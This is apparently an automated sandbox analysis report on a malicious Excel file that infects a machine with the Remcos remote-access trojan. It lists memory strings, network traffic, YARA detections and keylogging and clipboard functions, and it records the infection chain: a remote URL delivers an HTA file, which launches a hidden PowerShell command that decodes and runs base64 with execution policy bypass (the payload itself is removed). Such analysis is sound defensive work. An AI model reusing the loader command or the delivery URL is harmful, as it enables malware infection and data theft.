                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000005.00000002.448423237.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.512617659.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000022C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 35_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0041183A OpenClipboard,GetLastError,DeleteFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 33_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 33_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 35_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 35_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                  Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 35_2_0041BB77 SystemParametersInfoW

                  System Summary

                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: OC25-11-24.xls OLE: Microsoft Excel 2007+
                  Source: ~DF5ADC8DB78B38F887.TMP.0.dr OLE: Microsoft Excel 2007+
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64-encoded payload removed]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 30_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 31_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 33_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 33_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 35_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: OC25-11-24.xls, OLE indicator, VBA macros: true
                  Source: ~DF5ADC8DB78B38F887.TMP.0.dr, OLE indicator, VBA macros: true
                  Source: OC25-11-24.xlsStream path 'MBd00033108/\x1Ole' : https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout4f!VD>Uc2j_),bHiO|DMw=W8E {^h*DYogPx$MQ{-4EBw\Sy'@(OhL/5CHH 21rLuUs\N>[*7t*g>YPkwQJ0ZnC57VntnxBvghfkXyFpqEFZ1xYYkHJlgdmjJDFmCZkORTX8YnHBr3RT5PYTerZs2D6FSKP0tYHV2tfonXl6vB5kQqyZAaTwqE1P8sRr,{V^vR6.<
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'MBd00033108/\x1Ole' : https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout4f!VD>Uc2j_),bHiO|DMw=W8E {^h*DYogPx$MQ{-4EBw\Sy'@(OhL/5CHH 21rLuUs\N>[*7t*g>YPkwQJ0ZnC57VntnxBvghfkXyFpqEFZ1xYYkHJlgdmjJDFmCZkORTX8YnHBr3RT5PYTerZs2D6FSKP0tYHV2tfonXl6vB5kQqyZAaTwqE1P8sRr,{V^vR6.<
                  Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
